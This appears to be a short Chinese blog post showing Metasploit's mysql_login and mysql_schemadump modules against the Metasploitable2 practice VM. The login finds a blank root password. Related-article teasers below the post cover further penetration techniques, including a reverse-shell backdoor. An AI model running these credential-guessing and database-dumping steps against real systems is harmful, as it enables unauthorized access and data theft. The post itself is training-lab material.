Metasploitable2 - tcp port 3306 - mysql

最新推荐文章于 2023-05-15 13:30:12 发布
最新推荐文章于 2023-05-15 13:30:12 发布
阅读量1.9k 收藏
点赞数
分类专栏: Pentesting Metasploit Metasploitable2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nixawk/article/details/38326705
版权 


msf auxiliary(mysql_login) > show options

Module options (auxiliary/scanner/mysql/mysql_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   true             no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS            192.168.1.111    yes       The target address range or CIDR identifier
   RPORT             3306             yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   USERNAME          root             no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

msf auxiliary(mysql_login) > run

[*] 192.168.1.111:3306 MYSQL - Found remote MySQL version 5.0.51a
[*] 192.168.1.111:3306 MYSQL - [1/1] - Trying username:'root' with password:''
[+] 192.168.1.111:3306 - SUCCESSFUL LOGIN 'root' : ''
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

===========================================================================================

msf auxiliary(mysql_schemadump) > show options

Module options (auxiliary/scanner/mysql/mysql_schemadump):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   DISPLAY_RESULTS  true             yes       Display the Results to the Screen
   PASSWORD                          no        The password for the specified username
   RHOSTS           192.168.1.111    yes       The target address range or CIDR identifier
   RPORT            3306             yes       The target port
   THREADS          1                yes       The number of concurrent threads
   USERNAME         root             no        The username to authenticate as

msf auxiliary(mysql_schemadump) > run


Nixawk
关注
专栏目录
【Kali渗透全方位实战】Metasploitable2系统介绍
李响
04-25 1721
文章目录1 Metasploitable2使用指南2 服务3 易受攻击的web服务3.1 易受攻击的web服务:Mutillidae3.2 易被攻击的web服务:DVWA 1 Metasploitable2使用指南 Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。版本2已经可以下载,并且比上一个版本包含更多可利用的安全漏洞。...
DDoS攻击模拟与Metasploitable渗透
zzr2zr的博客
01-04 7367
DDoS攻击模拟与Metasploitable渗透 Part.1 DDoS介绍和发展史 1.DDoS:Distributed Denial of Service,分布式拒绝服务攻击。 2.带宽消耗型攻击,所谓带宽消耗型攻击就是攻击者将提供网络服务的正常的带宽消耗殆尽,带宽消耗殆尽后就会造成网络堵塞,从而当正常的用户与服务器进行通信时无法提供正常服务。举vps的例子,vps服务器一般都有固定的带宽,...
metasploitable mysql_Metasploitable介绍
weixin_33324007的博客
02-03 554
Metasploitable是一个虚拟靶机系统,里面含有大量未被修复的安全漏洞,它主要是用于metasploit-framework测试的漏洞目标。著名的渗透框架 Metasploit 出品方 rapid7 还提供了配置好的环境 Metasploitable,是一个打包好的操作系统虚拟机镜像,使用 VMWare 的格式。可以使用 VMWare Workstation(也可以用免费精简版的 VMWa...
kali linux对Metasploitable2漏洞利用,mysql爆力破解 笔记
边城浪子的博客
09-19 1251
MySQL是一个关系型数据库管理系统,由瑞典MySQL AB 公司开发,目前属于 Oracle 旗下产品。MySQL 是最流行的关系型数据库管理系统之一,在 WEB 应用方面,MySQL是最好的 RDBMS (Relational Database Management System,关系数据库管理系统) 应用软件。 MySQL是一种关系数据库管理系统,关系数据库将数据保存在不同的表中,而不是将所...
VMware安装Metasploitable2的过程解析
黄乔国PHP
05-15 295
Metasploitable2虚拟系统是一个特殊的ubuntu操作系统,本身设计目的是作为安全工具测试和演示常见漏洞攻击的环境。其中最核心是可以用来作为MSF攻击用的靶机。这样方便我们学习MSF框架的使用。并且开放了很多的高危端口如21、23、445等,而且具有很多未打补丁的高危漏洞, 如Samba MS-RPC Shell命令注入漏洞等,而且对外开放了很多服务,并且数据库允许外联等。系统中的用户口令均为弱口令。系统搭载了DVWA、Mutillidae等Web漏洞演练平台。对于学习有很大的帮助!
实战篇01 - 使用 Linux-msf 扫描 metasploitable2 靶机上MySQL服务的空密码
weixin_52297942的博客
01-23 4159
实战篇01 - 使用 Linux-msf 扫描 metasploitable2 靶机上MySQL服务的空密码文章目录
Metasploit连接postgres和mysql
only-ring的文档库
02-19 999
一、Matasploit连接postgres kali 2.0 已经没有metasploit 这个服务了,所以service metasploit start 的老方式不起作用。 在kali 2.0中启动带数据库支持的MSF方式如下: #1  首先启动postgresql数据库; root@kali:~#service postgresql start #2  初始化
通过Metasploitable2了解渗透测试基本思路
烛时雨
04-10 2888
0×00前言/什么是Metasploitable2: Metasploitable是一个刻意制造的Linux靶机。此系统可应用于渗透测试,测试安全工具以及实践常见的渗透测试技术。Metasploitable2比上一个版本包含更多可用漏洞,这个虚拟系统兼容VMware,VirtualBox和其他虚拟平台。 安装方法在此不做过多讲述本篇主要对metasploitable2进行渗透测试 ...
Metasploitable2渗透篇:弱口令
野原新之助
12-06 1868
渗透环境 靶机:Metasploitable2 ip:192.168.88.138 攻击主机:kali ip:192.168.88.129 渗透流程 打开 Metasploitable2 靶机,默认用户名密码皆为 msfadmin,登陆并输入 ifconfig查看靶机ip 打开kali,使用nmap扫描靶机开放端口情况 扫描出的详细结果: root@kali:~# nmap -T3 -v ...
Kali--渗透攻击Mysql数据库服务
齐泽文的Blog
04-12 1万+
Mysql是个关系型数据库管理系统,由瑞典Mysql AB开发,目前属于Oracle公司,在Metasploitable系统中,Mysql的身份认证存在漏洞,这个漏洞可以让攻击者不必提供正确的身份证书便可访问Mysql数据库。本教程将介绍使用MetasploitMysql扫描模块渗透攻击Mysql数据库服务。(1)启动MSFCONSOLE。root@kali:~#msfconsole(2)扫描所...
Metasploitable2靶机漏洞详解
12-11
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。
渗透之——Metasploit渗透MSSQL
冰河的专栏
01-18 1万+
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86535576 攻击机 kali 192.168.109.137 靶机 Win7_x64 192.168.109.139 数据库 MSSQL 2008 R2 MSSQL运行在TCP的1433端口以及UDP的1434端口 1.使用NMAP对MSSQL进行踩点 这里,我们使...
metasploitable2--简介--漏洞利用
weixin_45018333的博客
03-16 7370
1.metasploitable是用于评估metasploit的靶机。 2.metasploitable是一个Ubuntu-Linux虚拟机,用于测试常见漏洞。本质上是一个盒子中的渗透测试实验室,提供了执行渗透测试和渗透研究的安全场所。 3.闲聊一句:原来觉得搭建环境是很没有必要的,应该拿实际的网络去练习,但是结果就是很久没找到目标而且还不是一个很好的行为。就很懒得去搭建,太麻烦,但是现在忽然明白...
metasploit渗透测试笔记(内网渗透篇)
baidu_22850205的专栏
11-02 988
0x01 reverse the shell File 通常做法是使用msfpayload生成一个backdoor.exe然后上传到目标机器执行。本地监听即可获得meterpreter shell。 reverse_tcp/http/https => exe => victim => shell reverse_tcp windows: msfpayload wi
mysql 不监听tcp端口号_mariadb未监听TCP 3306问题解决
weixin_34043280的博客
01-19 2637
之前通过服务器本地访问mariadb数据库的时候都没有什么问题,今天开始尝试远程登录mariadb数据库,发现登录失败;而且发现TCP三次握手,客户端发送的syn报文,服务器端都没有回应。登录服务器,查看端口开放情况,发现3306端口是挂在tcp6上,相当于是ipv6就可以访问到服务器的3306端口,ipv4就访问不了。[root@server]# netstat -anplt | grep 33...
MySQL报错端口3306解决方法
热门推荐
北纬30°
08-31 2万+
安装MySQL时候回报错一些错误,比如文件中文名,但是比较最常见的就是端口号3306的占用。 在之前的MySQL安装:https://blog.csdn.net/qq_41879385/article/details/82215828,我就有遇到过这个问题。接下来看下面。 我们在安装的时候回报如下显示,在端口号的旁边会有一个黄色的感叹号。解决办法请看下面。  这是端口号3306被占用的缘...
使用MetasploitMySQL进行渗透测试
渗透测试
06-04 2435
文章目录前言一、db_nmap扫描1 常用nmap参数介绍2 具体过程二、查看版本1 介绍功能2 具体过程三、暴力破解密码1 介绍功能2 具体过程四、收集信息1 枚举数据库信息①介绍功能②具体过程2 导出密码hash①介绍功能②具体过程五、mysql认证漏洞利用1 介绍功能2 具体过程六、Mof提权1 介绍功能2 具体过程总结 前言 本文详细介绍了如何使用metasploitmysql进行简单渗透测试 一、db_nmap扫描 使用外置和内置的都行,使用metasploit内置的nmap需要启动post
metasploitable2.0_linux修改root密码
qq_36390239的博客
11-05 2272
msfadmin@metasploitable:~$ sudo passwd root [sudo] password for msfadmin:            #这里输入msfadmin的密码,也就是msfadmin Enter new UNIX password:            #这里输两次要更改的root的密码 Retype new UNIX pas
例举使用Nmap工具对靶机Metasploitable2-XP和Metasploitable2-Linux进行端口扫描
最新发布
05-26
以下是使用Nmap工具对Metasploitable2-XP和Metasploitable2-Linux进行端口扫描的步骤: 1. 确定目标主机的IP地址。可以使用ping命令或其他工具来确定目标主机的IP地址。 2. 打开终端,输入以下命令扫描...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值